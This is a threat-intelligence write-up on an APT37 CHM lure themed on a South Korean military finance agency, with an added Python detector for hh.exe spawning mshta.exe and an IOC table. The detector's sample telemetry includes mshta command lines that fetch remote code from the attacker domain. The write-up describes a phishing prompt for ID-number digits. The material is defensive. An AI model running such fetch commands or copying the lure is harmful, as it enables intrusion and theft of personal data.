Malware created by North Korean hacking group APT37 - 국군재정관리단.chm (2023.11.21)

2023-12-04 Sakai Malware created by North Korean hacking group APT37 - Armed Forces Financial Management Group.chm (2023.11.21)

https://wezard4u.tistory.com/6672


The write-up analyzes an APT37 CHM (compiled HTML Help) sample named after South Korea's Armed Forces Financial Management Group (국군재정관리단), a lure most plausibly aimed at military finance personnel. When the file is opened, the embedded help content launches mshta.exe, which contacts attiferstudio.com under an install.bak path; the sample then displays a fake encrypted-mail prompt asking the victim for the first six digits of a resident registration number (the birth-date portion). The source lists hashes for the CHM sample and notes that the remote site returned HTTP 404 at the time of the author's check, so the final downloaded payload could not be retrieved or confirmed from that URL. Vendor detections classify the file as a CHM, HTML, or JavaScript trojan downloader, and some engines use ScarCruft naming (an alias for APT37).
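The execution chain the write-up describes (HTML Help viewer spawns mshta.exe, which reaches out to the staging domain) is easy to catch in process-creation telemetry. The following is an added detection example written for this page, not code from the original post or from the analyst: it parses newline-delimited JSON records in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine, ProcessId), flags any mshta.exe launch whose parent is hh.exe or whose command line carries a remote URL, and checks the URL host against the domain indicator from the IOC table. The sample records are constructed; the full URL http://attiferstudio.com/install.bak is an assumption built from the page's "install.bak path" description, since the IOC table truncates the real value, and the other paths and PIDs are invented for illustration.

```python
import json
import re
from urllib.parse import urlparse

# Domain indicator taken from the page's IOC table.
IOC_DOMAINS = {"attiferstudio.com"}

# Crude but sufficient: pull http(s) URLs out of a command line.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def parse_events(text):
    """Parse newline-delimited JSON process-creation records (Sysmon Event ID 1 style)."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            events.append(json.loads(line))
    return events


def image_name(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_chm_mshta_chain(events):
    """Flag mshta.exe launches that look like the CHM -> mshta -> remote URL chain.

    A finding is raised when mshta.exe is started by hh.exe (the HTML Help viewer)
    or when its command line references a remote URL. Severity is 'high' when both
    conditions hold, 'medium' otherwise. ioc_match is True when a URL host matches
    the page's IOC domain list.
    """
    findings = []
    for ev in events:
        if image_name(ev.get("Image", "")) != "mshta.exe":
            continue
        parent = image_name(ev.get("ParentImage", ""))
        urls = URL_RE.findall(ev.get("CommandLine", ""))
        hh_parent = parent == "hh.exe"
        if not hh_parent and not urls:
            continue  # ordinary HTA usage; nothing in this chain to report
        hosts = [(urlparse(u).hostname or "").lower() for u in urls]
        findings.append({
            "pid": ev.get("ProcessId"),
            "parent": parent,
            "urls": urls,
            "ioc_match": any(h in IOC_DOMAINS for h in hosts),
            "severity": "high" if hh_parent and urls else "medium",
        })
    return findings


# Constructed sample telemetry (not from the original analysis). Record 1 models the
# chain described on the page; records 2-4 are benign or partial-match controls.
SAMPLE_EVENTS = r"""
{"ProcessId": 4120, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\hh.exe", "CommandLine": "mshta.exe http://attiferstudio.com/install.bak"}
{"ProcessId": 4188, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta.exe C:\\Tools\\inventory.hta"}
{"ProcessId": 4204, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\hh.exe", "CommandLine": "mshta.exe C:\\ProgramData\\update.hta"}
{"ProcessId": 4230, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "mshta.exe http://example.invalid/loader.hta"}
"""


if __name__ == "__main__":
    for f in flag_chm_mshta_chain(parse_events(SAMPLE_EVENTS)):
        print(f)
```

The hh.exe parent check is the load-bearing condition: CHM lures routinely rotate their staging domain, so an IOC hit is a bonus, not the primary signal. Tune the URL-only rule against your own baseline, since some environments run HTA applications from internal web servers.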

Indicators of Compromise

Type    Value                                     First seen   Last seen
DOMAIN  dhl.com                                   2023-09-26   2025-08-29
HASH    a372e8dfd1940ef4f9e74095a8bf3bd7          2023-03-21   2024-02-16
HASH    e73d679ca6314946072c41dcbbf59dc…          2023-12-04   2023-12-04
URL     http://attiferstudio.com/instal…          2023-12-04   2023-12-04
URL     http://attiferstudio.com/                 2023-12-04   2023-12-04
HASH    3d2738ff73af2bc88cb9c396b31f699…          2023-03-16   2023-12-04
DOMAIN  attiferstudio.com                         2023-03-16   2023-12-04

Note: dhl.com is DHL's legitimate corporate domain; its presence in this table reflects a mention in the source material rather than attacker infrastructure, so it should not be added to block lists on the strength of this entry. Hash and URL values ending in … are truncated as extracted and must be verified against the source post before use.
